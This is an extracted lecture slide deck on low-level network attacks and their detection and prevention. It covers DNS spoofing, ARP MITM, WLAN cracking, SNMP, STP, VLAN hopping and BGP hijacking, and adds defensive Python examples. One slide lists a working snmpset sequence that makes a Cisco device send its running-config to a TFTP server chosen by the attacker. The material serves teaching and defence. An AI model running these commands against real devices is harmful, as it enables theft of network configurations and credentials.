Jeroen van Beek - OS3 · 2018-04-12 · Kaminsky DNS Spoofing Attacker’s website contains link to...


Page 1
Jeroen van Beek

Page 2
Why bother?
Popular / interesting attacks
Now what?
Questions?

Page 3
Low-level attacks can be very dangerous
◦ In many cases difficult to detect / prevent in higher OSI levels

Page 4

Page 5
Passive attack
Works on non-switched networks
◦ Including WLAN
Find interesting information
◦ Plain text services
◦ HTTP logins (see lab assignment)
◦ SNMP
◦ Telnet (still used in some environments!)
◦ Password hashes (‘pass the hash’)
Detection and prevention
◦ Use switched networks

Page 6
Active attack
Switched environments only show broadcast / multicast traffic
Overflow CAM tables
◦ Switch will forward traffic to all ports
◦ See dsniff’s macof: https://www.monkey.org/~dugsong/dsniff/
Detection and prevention
◦ Limit the number of MACs per switch port
  ◦ Monitor or auto shutdown

Page 7
Using a forged source IP address to
◦ Impersonate other systems
Targets
◦ UDP services
◦ TCP services with predictable characteristics
◦ DoS

Page 8
Oldskewl problem
Weak authentication mechanisms using UDP
◦ Add your system to the list of trusted systems using a spoofed packet
More difficult to exploit for TCP services
◦ Because of handshaking
◦ However not impossible with TCP sequence prediction
However old mistakes are made again
◦ Everything over IP
◦ Burglar alarm over UDP
  ◦ Including status messages and switching the system off

Page 9
Kaminsky DNS Spoofing
◦ Attacker’s website contains link to x.domain.com
  ◦ E.g. an image
◦ Target’s DNS server resolves x.domain.com
◦ The attacker knows this and sends replies with fake records to the target
  ◦ UDP, query ID (QID) identifies reply
  ◦ QID is a 16 bit value (65,536 possibilities): send all
  ◦ Include forged referral for domain.com to poison the cache
◦ domain.com points to IP of attacker’s choice
◦ http://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Kaminsky/BlackHat-Japan-08-Kaminsky-DNS08-BlackOps.pdf
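Added example (not part of the original slides): the resolver-side view of the attack above. A reply is only usable if its QID, destination port and question match a live query, so the success odds for "send all 65,536 QIDs" collapse once the source port is randomised too; the same matching check yields a detection signal, a burst of replies that match no outstanding query. Sample replies and addresses are constructed.

```python
"""Reply matching and unsolicited-reply detection for the Kaminsky attack."""
from collections import Counter
from typing import NamedTuple


class Query(NamedTuple):
    qid: int     # 16-bit transaction ID
    sport: int   # UDP source port the query was sent from
    qname: str   # question name, e.g. x.domain.com


def accept_reply(outstanding: set, qid: int, dport: int, qname: str) -> bool:
    """A reply is only accepted if (QID, port, question) match a live query."""
    return Query(qid, dport, qname) in outstanding


def success_probability(forged_replies: int, entropy_bits: int) -> float:
    """Chance that an attacker who enumerates guesses without repetition hits
    the live query. QID only: 16 bits; QID plus a random source port: ~32."""
    return min(1.0, forged_replies / 2 ** entropy_bits)


def unsolicited_reply_counts(outstanding: set, replies) -> Counter:
    """Count replies per claimed source IP that match no outstanding query.
    Forged replies carry the authoritative server's IP as source, so a burst
    of mismatches 'from' that server is the detection signal."""
    counts = Counter()
    for src, qid, dport, qname in replies:
        if not accept_reply(outstanding, qid, dport, qname):
            counts[src] += 1
    return counts


def spoof_suspects(counts: Counter, threshold: int) -> list:
    """Claimed sources with at least `threshold` unsolicited replies."""
    return sorted(src for src, n in counts.items() if n >= threshold)


# Constructed sample: one live query and a handful of observed replies.
OUTSTANDING = {Query(0x1A2B, 40001, "x.domain.com")}
SAMPLE_REPLIES = [  # (claimed source IP, QID, destination port, qname)
    ("198.51.100.7", 0x1A2B, 40001, "x.domain.com"),  # the genuine answer
    ("198.51.100.7", 0x0001, 40001, "x.domain.com"),  # guessed QIDs ...
    ("198.51.100.7", 0x0002, 40001, "x.domain.com"),
    ("198.51.100.7", 0x0003, 40001, "x.domain.com"),
    ("198.51.100.7", 0x1A2B, 40002, "x.domain.com"),  # right QID, wrong port
    ("192.0.2.53", 0x7777, 40001, "other.example"),   # a stray, late reply
]

if __name__ == "__main__":
    print("QID only, 65536 guesses:", success_probability(65536, 16))
    print("QID + random port, 65536 guesses:", success_probability(65536, 32))
    counts = unsolicited_reply_counts(OUTSTANDING, SAMPLE_REPLIES)
    print("suspects:", spoof_suspects(counts, threshold=3))
```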

Page 10
Mainly used for DoS attacks
Increasing efficiency
◦ NTP monlist
◦ SNMP
◦ DNS: ANY query, DNSSEC
Send one spoofed packet to broadcast address
◦ Many hosts / services reply to spoofed address
◦ So called ‘smurf attack’

Page 11

Page 12
Detection
◦ Check source IPs
  ◦ IDS
Prevention
◦ Do not use source IPs for authentication purposes
◦ Do not use UDP for (indirect) authentication purposes
◦ Ingress / egress filtering
  ◦ Drop spoofed packets
  ◦ RFC 2827
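Added example (not from the slides): the ingress / egress rule of RFC 2827 written out as a border filter. Egress only lets packets with a site source prefix leave; ingress drops packets from the internet that claim a site prefix or a private / bogon source, which is what stops spoofed-source packets reaching the UDP services named on the previous slides. Prefixes and flow records are constructed.

```python
"""Ingress / egress source-address filtering in the spirit of RFC 2827."""
import ipaddress

# Constructed site prefixes: the only source addresses this site may emit.
SITE_PREFIXES = [ipaddress.ip_network("192.0.2.0/24"),
                 ipaddress.ip_network("2001:db8:1::/48")]

# Sources that can never legitimately arrive from the internet.
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "::1/128", "fc00::/7")]


def _in_any(addr, networks):
    # ipaddress returns False for a v4 address tested against a v6 network.
    return any(addr in net for net in networks)


def filter_verdict(direction: str, src: str) -> str:
    """Return 'forward' or 'drop' for a packet crossing the site border.
    direction is 'egress' (site -> internet) or 'ingress' (internet -> site)."""
    addr = ipaddress.ip_address(src)
    if direction == "egress":
        # Only our own prefixes may leave; anything else is a spoofed source.
        return "forward" if _in_any(addr, SITE_PREFIXES) else "drop"
    if direction == "ingress":
        # An outside packet cannot claim our prefixes or a private source.
        if _in_any(addr, SITE_PREFIXES) or _in_any(addr, BOGONS):
            return "drop"
        return "forward"
    raise ValueError(f"unknown direction {direction!r}")


def audit(flow_records):
    """Apply the filter to 'direction src dst' records and return the
    dropped ones, i.e. what an IDS checking source IPs would log."""
    dropped = []
    for line in flow_records:
        direction, src, _dst = line.split()
        if filter_verdict(direction, src) == "drop":
            dropped.append(line)
    return dropped


SAMPLE_FLOWS = [  # constructed flow records
    "egress 192.0.2.10 198.51.100.1",    # normal outbound
    "egress 203.0.113.5 198.51.100.1",   # spoofed source leaving the site
    "ingress 198.51.100.1 192.0.2.10",   # normal inbound
    "ingress 192.0.2.10 192.0.2.20",     # outsider claiming our own prefix
    "ingress 10.1.1.1 192.0.2.20",       # private source from the internet
]

if __name__ == "__main__":
    for rec in audit(SAMPLE_FLOWS):
        print("DROP", rec)
```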

Page 13
Used to become a man in the middle
Attacker answers clients before the real server does
◦ Provide client with fake DNS servers / gateway / ...
Monitor / modify traffic
Detection and prevention
◦ Several tools out there for detection
  ◦ Network devices: DHCP snooping
  ◦ UNIX: dhcp_probe
  ◦ Windows: dhcploc
◦ Shutdown unused network ports
◦ Lockdown client PCs

Page 14
Ethernet attack, both for wired and wireless
Fake an ARP address to become a man in the middle

Page 15
Find interesting information
◦ Plain text services
◦ Password hashes
Use MITM exploits for specific services
◦ E.g. SSHv1, HTTPS, POPS, IMAPS, SIPS, RDP
Sophisticated tools are available, automating MITM, sniffing and cracking
◦ Ettercap: https://github.com/Ettercap/ettercap
  ◦ Sed for network traffic
◦ Cain & Abel: http://www.oxid.it/cain.html
  ◦ http://www.youtube.com/watch?v=BXPqq_XQZu8

Page 16

Page 17
Detection and prevention
◦ Network devices: ARP inspection
◦ Limit the number of MACs per switch port
  ◦ Monitor or auto shutdown
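Added example (not from the slides): the host-side counterpart of ARP inspection for the ARP man-in-the-middle on the previous slides. It walks observed ARP replies and raises an alert when an IP (the gateway in particular) suddenly maps to a different MAC, or when one MAC answers for several IPs. The known binding and the reply log are constructed.

```python
"""Detect ARP cache poisoning from observed ARP replies (defender's view)."""
from collections import defaultdict

# Constructed ground truth: the gateway and its real MAC, learned out of band
# (e.g. from the switch's MAC table or a static inventory).
KNOWN_BINDINGS = {"192.0.2.1": "00:11:22:33:44:01"}


def analyse_arp_replies(replies, known=KNOWN_BINDINGS):
    """replies: iterable of (sender_ip, sender_mac) from ARP 'is-at' frames.
    Returns (ip, old_mac, new_mac) alerts: an IP whose MAC changes, or that
    contradicts a known binding, is the classic sign of a faked gateway."""
    seen = dict(known)          # copy, so the known table is never mutated
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        prev = seen.get(ip)
        if prev is None:
            seen[ip] = mac
        elif prev != mac:
            alerts.append((ip, prev, mac))
            seen[ip] = mac      # track the latest claim so flapping is visible
    return alerts


def macs_claiming_many_ips(replies, limit=2):
    """A single MAC answering for `limit` or more IPs is another indicator."""
    ips = defaultdict(set)
    for ip, mac in replies:
        ips[mac.lower()].add(ip)
    return {mac: sorted(v) for mac, v in ips.items() if len(v) >= limit}


SAMPLE_REPLIES = [  # constructed ARP reply log: (sender IP, sender MAC)
    ("192.0.2.1", "00:11:22:33:44:01"),   # gateway, genuine
    ("192.0.2.10", "00:11:22:33:44:0a"),  # a client
    ("192.0.2.1", "de:ad:be:ef:00:01"),   # gateway IP claimed by another MAC
    ("192.0.2.10", "de:ad:be:ef:00:01"),  # same MAC also claims the client
]

if __name__ == "__main__":
    for ip, old, new in analyse_arp_replies(SAMPLE_REPLIES):
        print(f"ALERT {ip}: {old} -> {new}")
    print(macs_claiming_many_ips(SAMPLE_REPLIES))
```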

Page 18
In most cases no device authentication
In many cases shared secrets
◦ WEP (still used for e.g. legacy industrial applications)
◦ WPA PSK (‘pre shared keys’)
◦ One key to own them all!
Flaws in crypto
◦ WEP
◦ WPA TKIP
◦ WPS

Page 19
Attacking isolated wireless networks
◦ High power adapters
◦ High gain antennas
Attacking crypto
◦ Weaknesses allow an attacker to retrieve the secret key
◦ Aircrack-ng: http://www.aircrack-ng.org/
◦ After retrieving the key it’s a virtual plain network cable
Attacking passwords
◦ Defaults
◦ Easy-to-guess / crack
◦ MAC derived: https://www.usenix.org/system/files/conference/woot15/woot15-paper-lorente.pdf
◦ Jam signal first to trigger association messages

Page 20

Page 21

Page 22
Attacking OS functionality
◦ Popular OSs store WLAN settings
◦ Device tries to find the SSIDs automatically
◦ Set up your own access point
  ◦ Forward traffic to real access point
◦ MITM
Detection and prevention
◦ Detection of rogue APs
◦ Prevent problems by hardening wireless equipment and by using proven technologies
  ◦ IEEE 802.1x
  ◦ AES encryption

Page 23
Many protocols are used for network management
◦ Simple Network Management Protocol (SNMP)
◦ Spanning Tree Protocol (STP)
◦ Cisco Discovery Protocol (CDP)
◦ Hot Standby Router Protocol (HSRP)
◦ …
Most are OSI layer 2 based
Most are designed with availability in mind
◦ Weak / no security features
Many are enabled by default

Page 24
Example: SNMP
◦ Uses ‘community strings’
  ◦ Some kind of secret password
  ◦ Read-only and read-write
  ◦ Defaults: ‘public’ and ‘private’
◦ Attacks
  ◦ Guess / brute force community string
  ◦ Most OSs: information leakage (accounts, routing)
  ◦ Cisco: dump config

Page 25

Page 26

# Set the ConfigCopyProtocol to TFTP
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1

# Set the SourceFileType to running-config
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4

# Set the DestinationFileType to networkfile
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1

# Set the ServerAddress to the IP address of the TFTP server
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a <TFTP IP>

# Set the CopyFilename to your desired file name
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s <Filename>

# Set the CopyStatus (row status) to active, which starts the copy process
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1

# Set the CopyStatus (row status) to delete, which cleans all saved information out of the MIB
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6

Page 27
Example: Spanning Tree Protocol
◦ Used for redundancy
◦ Takes care of topology changes
  ◦ Broken network links
  ◦ Network loops
  ◦ Malfunctioning network devices
◦ One device is the ‘root’
  ◦ The root can trigger a reconfiguration
◦ During reconfiguration all devices act like a hub
  ◦ Sniffing
◦ No security features in the protocol
  ◦ Become the root and reconfigure the network in such a way that all traffic passes through your system

Page 28

Page 29
Detection
◦ Monitor topology changes
  ◦ In practice: ?
Prevention
◦ IP based: ACLs
◦ Use security features of network equipment
◦ Never use network management protocols on access ports of end-users
◦ Disable all unneeded management protocols

Page 30
Connect to other – less restrictive – VLANs
◦ In many cases built into the driver
◦ Fancy tools available to make attacks easy to perform, e.g. (ab)using misconfigured network management protocols: http://www.yersinia.net/
◦ https://github.com/nccgroup/vlan-hopping---frogger
Detection
◦ Not needed, just prevent it
Prevention
◦ Disable trunk negotiation
◦ Configure ports as access ports
◦ Don’t use VLAN1

Page 31
Used for core routing on the internet
◦ Autonomous Systems (AS) advertise IP ranges that are reachable using their routers
Become an AS and start peering
Advertise IP ranges that aren’t yours
◦ Traffic is routed via your systems
◦ Sniffing, MITM
◦ Happens accidentally and on purpose

Page 32

Page 33

Page 34
Attacks
◦ http://www.blackhat.com/presentations/bh-europe-09/Rey_Mende/BlackHat-Europe-2009-Mende-Rey-All-Your-Packets-slides.pdf
◦ http://www.blackhat.com/docs/us-15/materials/us-15-Gavrichenkov-Breaking-HTTPS-With-BGP-Hijacking-wp.pdf
Detection
◦ Monitoring: https://bgpmon.net/
Prevention
◦ RPKI?

Page 35
Abuse authorized protocols to open unauthorized communication channels
◦ TCP over ICMP
  ◦ Ptunnel @ http://www.cs.uit.no/~daniels/PingTunnel/
◦ Tunnel IP over DNS
  ◦ Iodine @ http://code.kryo.se/iodine/
◦ Tunnel IP over …
  ◦ Everything!
◦ See https://www.os3.nl/_media/2005-2006/rp1/ms_mk_report.pdf, http://www.delaat.net/rp/2014-2015/p98/report.pdf and recent OT projects

Page 36

Page 37

Page 38
Detection
◦ Lab assignment!
Prevention
◦ Lab assignment!

Page 39
Sensitive information might also use other networks
◦ DECT, GSM, Bluetooth, …
Those are not covered in this talk
◦ However: be aware of the risks!
More and more phones and tablets are part of the network…
◦ Are they (also) well-protected against the attacks we’ve seen earlier today?

Page 40
Detection:
◦ Detection of well-known attacks using IDS
Prevention:
◦ Don’t trust the network!
◦ Shutdown all unused ports
◦ Enforce the use of safe protocols
  ◦ Problems on lower OSI levels shouldn’t affect the security level of applications
There’s more than (wireless) Ethernet
◦ Be aware of other technologies that provide access to sensitive information
  ◦ DECT, GSM, VoIP, …

Page 41
J.C.vanBeek uva.nl